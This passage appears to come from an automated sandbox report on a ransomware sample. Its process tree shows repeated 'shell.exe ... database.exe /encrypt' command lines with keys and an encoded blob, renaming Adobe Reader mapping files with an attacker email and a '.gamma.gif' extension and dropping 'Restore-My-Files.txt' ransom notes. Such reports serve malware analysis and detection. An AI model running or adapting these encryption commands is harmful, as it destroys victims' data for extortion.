                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6136
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3300
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4220
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5720
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4772
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6508
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6472
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6112
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5968
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1944
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5684
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6740
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2940
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5044
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3916
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2116
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4660
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6744
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
